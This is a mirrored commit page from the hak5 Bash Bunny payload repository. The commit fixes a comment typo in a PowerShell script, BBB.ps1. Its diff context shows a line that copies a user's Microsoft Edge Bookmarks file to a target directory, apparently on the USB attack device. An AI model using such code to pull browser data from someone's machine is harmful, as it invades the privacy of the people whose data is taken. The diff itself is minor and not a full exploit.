mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
Update BBB.ps1
Typo in comments, Chrome should be Edge.
This commit is contained in:
parent
5738de5e9e
commit
3e608cdd3d
@ -41,7 +41,7 @@ if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Dat
|
||||
throw $_.Exception.Message
|
||||
}
|
||||
}
|
||||
# Copy Chrome Bookmarks to Bash Bunny
|
||||
# Copy Edge Bookmarks to Bash Bunny
|
||||
else {
|
||||
Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$TARGETDIR2"
|
||||
}
|
||||
}
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user